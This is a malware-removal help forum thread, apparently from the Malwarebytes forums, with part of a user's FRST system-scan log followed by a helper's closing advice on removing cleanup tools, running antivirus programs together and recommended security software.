2016-02-10 10:43 - 2016-01-19 20:13 - 01063464 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 10:43 - 2016-01-19 20:12 - 01737088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 10:43 - 2016-01-19 20:12 - 01133744 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 01564496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 01501496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 00548024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 10:43 - 2016-01-19 19:15 - 00246784 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 10:43 - 2016-01-19 18:30 - 00862720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 10:43 - 2016-01-19 17:37 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-02-10 10:43 - 2016-01-10 20:37 - 00136912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-02-10 10:43 - 2016-01-10 17:51 - 03707392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 10:43 - 2016-01-10 17:39 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2016-02-10 10:43 - 2016-01-10 17:38 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2016-02-10 10:43 - 2016-01-10 17:36 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2016-02-10 10:43 - 2016-01-10 17:36 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2016-02-10 10:43 - 2016-01-10 17:35 - 02243584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2016-02-10 10:43 - 2016-01-10 17:35 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 10:43 - 2016-01-10 17:29 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2016-02-10 10:43 - 2016-01-10 17:29 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2016-02-10 10:43 - 2016-01-10 17:27 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2016-02-10 10:43 - 2016-01-10 17:26 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 10:43 - 2016-01-06 19:25 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 10:43 - 2015-12-28 22:42 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSync.dll
2016-02-10 10:43 - 2015-12-28 21:31 - 00578048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSync.dll
2016-02-10 10:43 - 2015-12-17 19:29 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 10:43 - 2015-12-17 17:17 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-05 15:36 - 2016-02-05 15:41 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-02-05 15:36 - 2016-02-05 15:41 - 00000000 ____D C:\WINDOWS\system32\NV
2016-02-05 15:36 - 2016-01-23 02:12 - 00110016 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2016-02-05 15:34 - 2016-01-23 04:42 - 42983992 _____ C:\WINDOWS\system32\nvcompiler.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 37614528 _____ C:\WINDOWS\SysWOW64\nvcompiler.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 31079992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 24911296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 21193544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 20733832 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 17626352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 17218792 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 16327896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvwgf2um.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 12379072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvlddmkm.sys
2016-02-05 15:34 - 2016-01-23 04:42 - 03145272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 02721216 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 01924152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6436175.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 01573432 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6436175.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00948672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00880576 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00747064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00689600 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00501896 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00425016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00423080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00377792 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00307768 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvkflt.sys
2016-02-05 15:34 - 2016-01-23 04:42 - 00151368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglshim64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00128512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglshim32.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00038336 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvpciflt.sys
2016-02-05 15:22 - 2015-12-18 07:11 - 00047760 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2016-02-05 15:22 - 2015-12-18 07:10 - 00099472 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2016-02-05 15:22 - 2015-12-18 07:10 - 00090768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2016-02-05 13:45 - 2016-02-05 13:45 - 00000000 ____D C:\Users\Eirik\Documents\Rise of the Tomb Raider
2016-02-05 13:45 - 2016-02-05 13:45 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Crystal Dynamics
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\Users\Eirik\Documents\League of Legends
2016-01-31 01:28 - 2016-01-31 01:28 - 00341353 _____ C:\Users\Eirik\Desktop\video-1446899994.mp4.mp4
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-27 02:02 - 2014-07-25 13:25 - 00003916 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{32D050CF-12B8-4CBE-8467-C4377C801BA0}
2016-02-27 02:00 - 2013-08-30 10:07 - 00000000 ___RD C:\Users\Eirik\Dropbox
2016-02-27 02:00 - 2013-08-30 10:04 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Dropbox
2016-02-27 01:59 - 2015-08-05 14:44 - 00000000 __RDO C:\Users\Eirik\OneDrive
2016-02-27 01:59 - 2012-07-26 08:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-27 01:56 - 2013-08-22 14:36 - 00000000 ____D C:\WINDOWS\Inf
2016-02-26 15:24 - 2015-12-30 22:05 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Skype
2016-02-26 15:23 - 2014-11-14 22:52 - 00000000 ____D C:\Users\Eirik\AppData\Local\Spotify
2016-02-26 15:20 - 2014-11-02 18:55 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-02-26 15:15 - 2014-11-14 22:52 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Spotify
2016-02-26 14:42 - 2013-08-29 17:54 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-730552332-2537374774-3045828507-1002
2016-02-26 14:28 - 2015-06-18 12:18 - 00000930 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-730552332-2537374774-3045828507-1002UA.job
2016-02-26 12:29 - 2013-09-14 00:46 - 00000024 _____ C:\Users\Eirik\random.dat
2016-02-26 12:28 - 2013-09-14 00:46 - 00000024 _____ C:\Users\Eirik\jagexappletviewer.preferences
2016-02-26 12:24 - 2013-09-14 00:46 - 00000044 _____ C:\Users\Eirik\jagex_cl_runescape_LIVE.dat
2016-02-26 03:19 - 2014-06-20 15:26 - 00000000 ____D C:\Users\Eirik
2016-02-25 21:06 - 2013-09-25 17:32 - 09135104 ___SH C:\Users\Eirik\Desktop\Thumbs.db
2016-02-25 18:07 - 2016-01-20 21:08 - 00004182 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-02-25 18:06 - 2013-09-04 05:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\CrashDumps
2016-02-25 18:04 - 2013-12-22 04:00 - 00000000 ____D C:\Users\Eirik\AppData\Local\LogMeIn Hamachi
2016-02-25 18:01 - 2014-06-20 15:13 - 00000000 ____D C:\ProgramData\NVIDIA
2016-02-25 18:01 - 2013-08-22 15:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-24 14:33 - 2013-12-13 23:26 - 00000000 ____D C:\ProgramData\InstallMate
2016-02-23 19:03 - 2013-08-22 16:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-02-22 23:04 - 2013-08-22 14:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-02-22 22:02 - 2013-09-06 10:34 - 00000000 ____D C:\Users\Eirik\AppData\LocalLow\Temp
2016-02-22 16:43 - 2014-03-18 10:51 - 01381246 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-22 16:43 - 2014-03-18 10:23 - 00450948 _____ C:\WINDOWS\system32\perfh014.dat
2016-02-22 16:43 - 2014-03-18 10:23 - 00077588 _____ C:\WINDOWS\system32\perfc014.dat
2016-02-21 21:10 - 2013-04-24 23:16 - 00000000 ____D C:\Program Files (x86)\Bluetooth Suite
2016-02-21 15:14 - 2013-11-19 23:06 - 00000000 ____D C:\Program Files (x86)\Google
2016-02-21 13:29 - 2015-12-26 01:49 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-02-21 13:26 - 2013-02-22 19:15 - 00000000 ____D C:\WINDOWS\hr
2016-02-21 12:42 - 2015-07-10 01:03 - 00000000 ____D C:\ProgramData\Apple
2016-02-20 19:45 - 2013-08-29 18:03 - 00000000 __SHD C:\WINDOWS\SysWOW64\AI_RecycleBin
2016-02-19 20:27 - 2013-08-22 15:44 - 05103608 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-02-19 18:26 - 2013-12-17 09:57 - 00000000 ____D C:\Users\Eirik\Desktop\Ny mappe
2016-02-19 12:54 - 2013-08-29 17:55 - 00000000 ____D C:\Users\Eirik\Desktop\Spill
2016-02-18 14:04 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-02-18 11:42 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-02-16 23:25 - 2015-11-13 18:03 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-16 13:24 - 2014-04-10 11:31 - 00000713 _____ C:\Users\Eirik\Desktop\Ranked stuff.txt
2016-02-14 04:28 - 2015-06-18 12:18 - 00000878 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-730552332-2537374774-3045828507-1002Core.job
2016-02-13 21:46 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\rescache
2016-02-13 03:06 - 2014-03-18 10:36 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-13 03:05 - 2014-12-12 01:15 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-02-13 03:05 - 2013-08-22 16:36 - 00000000 ___RD C:\WINDOWS\ToastData
2016-02-13 01:50 - 2015-08-18 23:07 - 00000000 ____D C:\Users\Eirik\.oracle_jre_usage
2016-02-13 01:49 - 2013-08-29 22:43 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\Program Files\WinRAR
2016-02-13 01:46 - 2013-10-13 21:15 - 00000000 ____D C:\ProgramData\Oracle
2016-02-13 01:32 - 2013-10-06 01:40 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\vlc
2016-02-12 02:59 - 2013-08-30 16:41 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-12 02:54 - 2013-08-30 16:41 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-10 22:20 - 2014-11-02 18:55 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-02-10 10:21 - 2013-08-22 16:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-10 02:32 - 2013-08-30 14:06 - 00000000 ____D C:\ProgramData\Skype
2016-02-05 15:37 - 2014-06-20 15:12 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-02-05 15:37 - 2014-06-20 15:12 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-02-05 15:35 - 2014-06-20 15:12 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-02-05 15:27 - 2013-12-12 02:23 - 00000000 ____D C:\Users\Eirik\AppData\Local\NVIDIA
2016-02-02 03:37 - 2013-08-22 16:38 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-02 03:37 - 2013-08-22 16:38 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-31 13:43 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\system32\NDF
 
==================== Files in the root of some directories =======
 
2013-09-30 11:50 - 2013-09-30 13:33 - 0000132 _____ () C:\Users\Eirik\AppData\Roaming\Adobe BMP Format CS6 Prefs
2013-10-01 23:21 - 2015-11-29 14:29 - 0000132 _____ () C:\Users\Eirik\AppData\Roaming\Adobe PNG Format CS6 Prefs
2015-12-26 02:02 - 2015-12-26 02:02 - 0000046 _____ () C:\Users\Eirik\AppData\Roaming\Camdata.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0000408 _____ () C:\Users\Eirik\AppData\Roaming\CamLayout.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0000408 _____ () C:\Users\Eirik\AppData\Roaming\CamShapes.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0004536 _____ () C:\Users\Eirik\AppData\Roaming\CamStudio.cfg
2015-12-26 01:52 - 2015-12-26 01:52 - 0000096 _____ () C:\Users\Eirik\AppData\Roaming\version2.xml
2014-05-18 17:30 - 2014-05-18 21:19 - 0000173 _____ () C:\Users\Eirik\AppData\Local\msmathematics.qat.Eirik
2013-10-31 21:32 - 2013-10-31 21:46 - 0000600 _____ () C:\Users\Eirik\AppData\Local\PUTTY.RND
 
Some files in TEMP:
====================
C:\Users\Eirik\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-25 18:19
 
==================== End of FRST.txt ============================

 

Again, the post is too long, so I will add addition.txt as an attached File.

Addition.txt


Hello,
 

Right, damn. Yes, I believe I installed it right after I first posted or something. As I was after all getting the viruses while I had Avast (Which I still do have tho.), I thought I'd just buy SpyHunter which I saw someone recommend somewhere. Sorry if I should not have done that in the process or should have said so. 

You may wish to look into the dispute between BleepingComputer.com and Enigma Software Group. I will let you form your own opinion on the matter. 
 
Your logs are OK. Let's see if the following helps:
 
Launching Mozilla Firefox in Safe Mode

  • Press the Windows Key + r on your keyboard at the same time. Type firefox --safe-mode and click OK.
  • Leave all items unchecked.
  • Click Restart.
  • If you are presented with an option to simply Start in Safe Mode please select that. 
  • Let me know if Firefox functions normally. 

It did! Thank you so much for your help, Adam!

Now, just to round things up.
- Which of the programs installed in the process should I keep? (adwcleaner, Revo uninstaller etc)
- Should I have all the different antiviruses running at the same time? (Avast, SpyHunter 4 and MalwareBytes)
- It seems the popup I mentioned with skype is just happening because Skype is using so many different... something. There's nothing to be afraid of, so I can add skype to the list of "cleared" processes?

Again, thank you so much for your help! You've been awesome. 


Excellent. :)
 

- Which of the programs installed in the process should I keep? (adwcleaner, Revo uninstaller etc)

Most of the tools used during this process are specialised, and should be removed from your computer. We have a programme (DelFix) that will automatically do this for you - instructions for which follow below. Revo Uninstaller can either be left installed or uninstalled through your Control Panel - it's worth keeping installed in my opinion. 
 

- Should I have all the different antiviruses running at the same time? (Avast, SpyHunter 4 and MalwareBytes)

Malwarebytes Anti-Malware (Trial, Free or Premium) is not an Anti-Virus, or a replacement for one. The programme can run in conjunction with your real-time Anti-Virus, and should not cause any issues. Malwarebytes Anti-Malware Trial or Premium provides an extra layer of real-time protection; the Free version acts as an on-demand scanner to check for the presence of malware. Avast Anti-Virus and Malwarebytes Anti-Malware is a common combination of security programmes. As for SpyHunter 4, please see my earlier comment on the programme. 
 

- It seems the popup I mentioned with skype is just happening because Skype is using so many different... something. There's nothing to be afraid of, so I can add skype to the list of "cleared" processes?

Skype is a Peer-to-Peer (P2P) programme, and connects to a wide range of IP addresses in order to establish a good or functioning connection. Sometimes Skype may connect to an IP address known to host malware. This is a risk of P2P programme usage. See here. I would not suggest adding Skype as an exclusion. 
 
All Clean!
Congratulations, your computer appears clean!
I see no signs of malware on your computer, and feel satisfied our work here is done. The steps below will remove the tools we have used, and reset any settings changed. I have also provided a list of resources and tools that you may find useful. 
 
DelFix

  • Please download DelFix and save the file to your Desktop.
  • Double-click DelFix.exe to run the programme.
  • Place a checkmark next to the following items:
    • Remove disinfection tools
    • Create registry backup
    • Purge system restore (creates a Restore Point/removes all but the most recent)
    • Reset system settings
  • Click the Run button.

-- DelFix will remove the specialised tools we used to clean your computer. Any leftover logs, files, folders or tools remaining on your computer which were not removed can be deleted manually (right-click the file + delete).
 
======================================================
 
I have compiled below a list of resources you may find useful. The articles document information on computer security, common attack vectors and how you can stay safe on the Internet.

The following programmes come highly recommended in the security community.

  • AdBlock is a browser add-on that blocks annoying banners, pop-ups and video ads.
  • CryptoPrevent places policy restrictions on loading points for ransomware (e.g. CryptoWall), helping prevent the execution of malware.
  • Malwarebytes Anti-Exploit (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
  • Malwarebytes Anti-Malware Premium (MBAM) works in real-time alongside your Anti-Virus to prevent malware execution.
  • NoScript is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology.
  • Secunia PSI will scan your computer for vulnerable software that is outdated and automatically find the latest update for you.
  • Web of Trust (WOT) is a browser add-on designed to alert you before interacting with a potentially malicious website.

-- Please feel free to ask if you have any questions or concerns on computer security or the programmes above.
 
======================================================
 
Please confirm you have no outstanding issues, and feel happy with the state of your computer. Once I have confirmation, we can wrap things up and I will close this topic. 
 
Thank you for using Malwarebytes.
 
Safe Surfing.
Adam
